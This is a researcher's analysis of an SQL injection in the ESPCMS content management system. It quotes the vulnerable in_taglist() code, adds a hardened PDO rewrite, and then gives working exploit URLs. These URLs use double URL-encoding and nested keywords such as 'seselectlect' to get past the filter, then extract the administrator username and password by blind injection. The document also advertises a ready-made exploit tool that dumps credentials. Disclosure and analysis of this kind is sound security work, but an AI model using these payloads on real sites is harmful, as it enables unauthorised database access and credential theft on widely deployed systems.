Espcms Universal SQL Injection Vulnerability Analysis (with EXP)

Vulnerability: Espcms universal SQL injection vulnerability analysis, with EXP
Vulnerability author: Seay
Blog: www.cnseay.com

Official site introduction:

ESPCMS (Yisi ESPCMS Enterprise Website Management System) is an enterprise website management system built on the LAMP stack. It is easy to operate, powerful, stable, extensible and secure, and convenient for secondary development and later maintenance, helping you build a strong, professional corporate website quickly and easily.

Search-engine index count: 85W (850,000 pages)

The vulnerability exists in the in_taglist() function of both interface/search.php and interface/3gwap_search.php; the problem is identical in both. Taking interface/search.php as the example:

function in_taglist() {
	parent::start_pagetemplate();
	include_once admin_ROOT . 'public/class_pagebotton.php';

	$page = $this->fun->accept('page', 'G');
	$page = isset($page) ? intval($page) : 1;
	$lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
	// urldecode() runs after GPC escaping, so a double-encoded quote (%2527) arrives unescaped
	$tagkey = urldecode($this->fun->accept('tagkey', 'R'));
	// only a keyword blacklist (see inputcodetrim() below), no escaping
	$tagkey = $this->fun->inputcodetrim($tagkey);

	$db_where = ' WHERE lng=\'' . $lng . '\' AND isclass=1';
	if (empty($tagkey)) {
		$linkURL = $_SERVER['HTTP_REFERER'];
		$this->callmessage($this->lng['search_err'], $linkURL, $this->lng['gobackbotton']);
	}
	if (!empty($tagkey)) {
		// $tagkey is concatenated straight into the WHERE clause
		$db_where.=" AND FIND_IN_SET('$tagkey',tags)";
	}
	$pagemax = 20;
	$pagesylte = 1;
	$templatesDIR = $this->get_templatesdir('article');
	$templatefilename = $lng . '/' . $templatesDIR . '/search';

	$db_table = db_prefix . 'document';
	// first query: COUNT(*) with the tainted $db_where
	$countnum = $this->db_numrows($db_table, $db_where);
	if ($countnum > 0) {
		$numpage = ceil($countnum / $pagemax);
	} else {
		$numpage = 1;
	}
	// second query: the same tainted $db_where, only reached if the first query succeeded
	$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,
		color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";
	$this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], $this->CON['is_rewrite']);
	$sql = $this->htmlpage->PageSQL('pid,did', 'down');
	$rs = $this->db->query($sql);
	while ($rsList = $this->db->fetch_assoc($rs)) {
		// ...
	}
}

Because the $tagkey variable is passed through urldecode(), the GPC escaping can be bypassed, and in the end

$db_where.=" AND FIND_IN_SET('$tagkey',tags)";

carries $tagkey into the SQL statement.

Further down you can also see

$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";

which is likewise sent to the database, so both statements are injectable, and the second SQL statement is the one that can return data. However, espcms's default configuration does not display SQL errors, and the first SQL statement only returns count(*), i.e. an int.

Even more annoyingly, as soon as the first query errors out, the second is never executed. So the only option is blind injection through the first query.

Vulnerability test EXP: http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=a%2527

espcms does ship its own anti-injection function, inputcodetrim() in the file public\class_function.php:

function inputcodetrim($str) {
	if (empty($str)) return $str;
	// decode HTML entities first
	$str = str_replace("&amp;", "&", $str);
	$str = str_replace("&gt;", ">", $str);
	$str = str_replace("&lt;", "<", $str);
	$str = str_replace("&lt;", "<", $str);
	// single-pass, case-insensitive keyword removal: nothing is escaped, only deleted
	$str = str_ireplace("select", "", $str);
	$str = str_ireplace("join", "", $str);
	$str = str_ireplace("union", "", $str);
	$str = str_ireplace("where", "", $str);
	$str = str_ireplace("insert", "", $str);
	$str = str_ireplace("delete", "", $str);
	$str = str_ireplace("update", "", $str);
	$str = str_ireplace("like", "", $str);
	$str = str_ireplace("drop", "", $str);
	$str = str_ireplace("create", "", $str);
	$str = str_ireplace("modify", "", $str);
	$str = str_ireplace("rename", "", $str);
	$str = str_ireplace("count", "", $str);
	$str = str_ireplace("from", "", $str);
	$str = str_ireplace("group by", "", $str);
	$str = str_ireplace("concat", "", $str);
	$str = str_ireplace("alter", "", $str);
	$str = str_ireplace("cas", "cast", $str);
	// strip attributes from a few HTML tags
	$str = preg_replace("/<span[^>]+>/i", "<span>", $str);
	$str = preg_replace("/<p[^>]+>/i", "<p>", $str);
	$str = preg_replace("/<font[^>]+>/i", "<font>", $str);
	$str = preg_replace("/width=(\'|\")?[\d%]+(\'|\")?/i", "", $str);
	$str = preg_replace("/height=(\'|\")?[\d%]+(\'|\")?/i", "", $str);
	$str = preg_replace("'<style[^\f]*?(\/style>)'si", "", $str);
	return $str;
}

It merely replaces keywords with an empty string, so for example union can be written as uunionnion to bypass the built-in anti-injection; it also gets past any WAF that does not block single quotes.
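For comparison, here is a hardened version of the in_taglist() lookup that addresses both problems described above (the second urldecode() and the keyword blacklist). This is an added example, not Espcms code; it assumes a PDO handle $pdo to MySQL with emulated prepares disabled and a table named espcms_document.

```php
<?php
// Added example, not Espcms code. Assumes $pdo is a PDO MySQL handle created with
// PDO::ATTR_EMULATE_PREPARES => false, and that the table is espcms_document.
// Both original defects are removed here:
//  1. no urldecode() on input: PHP already decodes the query string once, and the
//     second decode is what turned %2527 into a raw quote after GPC escaping;
//  2. no inputcodetrim()-style blacklist: str_ireplace('union', '', 'uunionnion')
//     still yields 'union', so deleting keywords cannot make a value safe.
function in_taglist_safe(PDO $pdo, string $lng, $rawTagkey, int $page = 1, int $pagemax = 20): array
{
    $tagkey = trim((string) $rawTagkey);
    if ($tagkey === '' || strlen($tagkey) > 64) {
        throw new InvalidArgumentException('tagkey is required and at most 64 bytes');
    }
    // FIND_IN_SET() splits the stored list on commas, so a tag containing a comma can never match.
    if (strpos($tagkey, ',') !== false) {
        return [];
    }
    $page   = max(1, $page);
    $offset = ($page - 1) * $pagemax;

    // The user value reaches MySQL only as a bound parameter; the SQL text itself is constant.
    $where = 'WHERE lng = :lng AND isclass = 1 AND FIND_IN_SET(:tagkey, tags)';

    // First query: COUNT(*) for pagination (what the original's db_numrows() call did).
    $count = $pdo->prepare("SELECT COUNT(*) FROM espcms_document $where");
    $count->execute([':lng' => $lng, ':tagkey' => $tagkey]);
    $total = (int) $count->fetchColumn();
    if ($total === 0) {
        return [];
    }

    // Second query: one page of rows. LIMIT values are bound as integers, never interpolated.
    $stmt = $pdo->prepare(
        "SELECT did, pid, title, filename FROM espcms_document $where ORDER BY pid DESC, did DESC LIMIT :off, :max"
    );
    $stmt->bindValue(':lng', $lng);
    $stmt->bindValue(':tagkey', $tagkey);
    $stmt->bindValue(':off', $offset, PDO::PARAM_INT);
    $stmt->bindValue(':max', $pagemax, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

With the value bound rather than concatenated, a%27 or a%2527 is simply looked up as a tag string, and the blacklist becomes unnecessary.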

Guessing the username length:

http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 1=(seselectlect length(username) frfromom espcms_admin_member limit 1) limit 1-- by seay

Brute-forcing the username and password:

http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1-- by seay

I wrote an Exp; download address:

Usage: espcms_exp_by_Seay.exe www.cnseay.com

It automatically dumps the table prefix, username and password.

Finally, a screenshot from the official site:
